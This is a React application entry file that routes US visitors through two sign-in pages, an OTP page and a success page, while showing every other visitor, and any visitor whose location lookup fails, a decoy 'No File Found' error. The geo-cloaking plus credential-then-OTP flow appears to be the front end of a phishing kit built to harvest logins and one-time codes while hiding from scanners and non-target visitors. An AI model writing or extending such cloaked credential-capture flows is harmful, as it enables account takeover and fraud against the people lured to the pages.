import React, { useEffect, useState } from "react";
import { BrowserRouter as Router, Routes, Route } from "react-router-dom";
import SignIn from "./SignIn";
import SignIn2 from "./signin2";
import Otp from "./Otp";
import Success from "./success";

const App = () => {
  const [isAllowed, setIsAllowed] = useState(null);

  useEffect(() => {
    const checkUserLocation = async () => {
      try {
        // Free GeoIP service to get country information
        const response = await fetch("https://ipapi.co/json/");
        const data = await response.json();

        // Check if the user is from the USA
        if (data && data.country_code === "US") {
          setIsAllowed(true);
        } else {
          setIsAllowed(false);
        }
      } catch (error) {
        console.error("Error checking location:", error);
        setIsAllowed(false); // Default to "No File Found" if the API fails
      }
    };

    checkUserLocation();
  }, []);

  if (isAllowed === null) {
    return <div>Loading...</div>; // Show a loading message while checking the location
  }

  return (
    <Router>
      <Routes>
        {isAllowed ? (
          <>
            <Route path="/" element={<SignIn />} />
            <Route path="/signin2" element={<SignIn2 />} />
            <Route path="/otp" element={<Otp />} />
            <Route path="/success" element={<Success/>} />
          </>
        ) : (
          <Route
            path="*"
            element={
              <div style={{ textAlign: "left", marginTop: "50px" }}>
                <h1>No File Found</h1>
                <p>site is unavilable.</p>
              </div>
            }
          />
        )}
      </Routes>
    </Router>
  );
};

export default App;